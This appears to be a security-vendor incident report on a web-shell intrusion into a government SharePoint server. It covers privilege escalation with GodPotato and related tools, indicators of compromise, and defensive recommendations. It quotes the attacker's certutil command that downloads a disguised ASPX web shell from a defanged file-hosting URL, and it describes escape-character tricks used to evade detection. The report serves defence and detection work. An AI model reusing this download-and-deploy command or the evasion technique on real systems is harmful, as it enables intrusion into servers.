Full Report
Kaspersky SOC analysts discuss a recent incident where the well-known Behinder web shell was used as a post-exploitation backdoor, showing how web shells have evolved.
Analysis Summary
# Incident Report: Web Shell Deployment and Privilege Escalation via Potato Tools in Government Infrastructure
## Executive Summary
A security incident was detected early Monday morning on a SharePoint server belonging to a government infrastructure entity in Southeast Asia, triggered by a SIEM alert flagging a heuristic detection of a web shell. Attackers utilized an obfuscated `certutil` command, leveraging the abused file-hosting service Bashupload, to deploy the initial payload disguised as a 404 page. Following deployment, the threat actors successfully escalated privileges using variants of the Potato exploitation framework (GodPotato, BadPotato, SweetPotato), ultimately gaining system-level access and beginning domain trust enumeration.
## Incident Details
- Discovery Date: Early Monday morning (Approx. 4 AM UTC)
- Incident Date: Occurred prior to 4 AM UTC on the day of discovery.
- Affected Organization: Government Infrastructure (Southeast Asia)
- Sector: Government Infrastructure
- Geography: Southeast Asia
## Timeline of Events
### Initial Access
- Date/Time: Prior to 4 AM UTC (Detected Monitoring time was 4 AM UTC).
- Vector: Exploitation of a vulnerable web server, potentially via an existing web shell or a command injection vulnerability.
- Details: An attempt was observed to deploy a new web shell disguised as an `App_Web_404.aspx` file. The command used the obfuscated `certutil -urlcache -split -f hxxps://bashupload[.]com/[REDACTED]/404.aspx` to download the payload from the abused file-hosting service.
### Lateral Movement
- Details: After gaining system privileges, attackers began domain trust enumeration, mapping relationships between domains to identify future targets. (Specific lateral movement techniques beyond domain mapping were not detailed).
### Data Exfiltration/Impact
- Impact: The attackers achieved **System privileges** on the SharePoint server. The ultimate goal (data exfiltration) was not fully detailed, but elevated access was achieved.
### Detection & Response
- Detection: Alert generated by Kaspersky Endpoint Security’s heuristic engine flagging `HEUR:Backdoor.MSIL.WebShell.gen` on the SharePoint server's worker process (`w3wp.exe`).
- Response Actions: The night shift team initiated immediate preliminary threat analysis. Due to client restrictions (retaining ownership of sensitive asset isolation), immediate blocking of the attack could not occur; the response focused on observation and analysis first.
## Attack Methodology
- Initial Access: Exploitation leading to download of ASPX web shell using obfuscated `certutil`.
- Persistence: (Implied via the established web shell, though specific persistence mechanisms beyond the initial stage were not detailed).
- Privilege Escalation: Successful use of GodPotato, alongside detection of BadPotato and SweetPotato variants, to move from service account context to **System privileges**.
- Defense Evasion: Attackers used escape characters (`^` and `“`) in the `certutil` command to bypass basic pattern-matching detection rules.
- Credential Access: (Not explicitly detailed for credential theft, but system-level access often precedes this.)
- Discovery: Manual command execution observed, including `whoami`, `net user query user`, and typo-ridden commands like "localgorup" (intended for `net localgroup administrators`).
- Lateral Movement: Domain trust enumeration performed after privilege escalation.
- Collection: (Specific data collection methods not explicitly mentioned beyond the initial reconnaissance.)
- Exfiltration: (No details provided on successful data exfiltration.)
- Impact: Compromise of the SharePoint server leading to System-level access.
## Impact Assessment
- Financial: Not disclosed.
- Data Breach: Potential exposure of internal information due to reconnaissance. The specific type or volume of data is not quantified.
- Operational: Possible disruption due to compromise of a government infrastructure SharePoint server, though the investigation focused on response rather than mandatory operational shutdown.
- Reputational: Minimal public impact disclosed at the time of the analysis snippet.
## Indicators of Compromise
- Network indicators: `hxxps://bashupload[.]com/[REDACTED]/404.aspx` (Defanged URI)
- File indicators: GodPotato binary located at `C:\ProgramData\DRM\god.exe` and `C:\Users\Default\Videos\god.exe`.
- Behavioral indicators: Use of heavily obfuscated syntax for `certutil` to inject payloads; execution of Potato family tools in memory or as binaries via the IIS worker process (`w3wp.exe`).
## Response Actions
- Containment: Delayed due to client policy; response initially focused on observation and preliminary analysis. (Specific containment steps post-analysis are not detailed in the provided text.)
- Eradication: (Not detailed.)
- Recovery: (Not detailed.)
## Lessons Learned
- Web shells remain a critical post-exploitation tool, even evolving to include in-memory execution capabilities.
- Attackers continue to leverage well-known, documented frameworks (like the Potato family) due to their modularity and success against privileged services.
- Abuse of legitimate file hosting/upload services (like Bashupload) is a reliable technique for initial payload delivery.
- Misconfigured client environments regarding host isolation can complicate immediate containment procedures, forcing analysts into an observation phase.
## Recommendations
- Implement strict egress filtering to limit the use of command-line download utilities (`certutil`, `bitsadmin`, etc.) for fetching external payloads.
- Enhance detection rules to specifically target the command structure used for obfuscating Windows utilities (`certutil` keywords broken by escape characters).
- Review and secure configurations related to incident response playbooks to streamline the balancing act between client decision authority and time-sensitive isolation needs.
- Deploy robust EDR/Heuristic capabilities capable of detecting in-memory execution associated with known privilege escalation frameworks.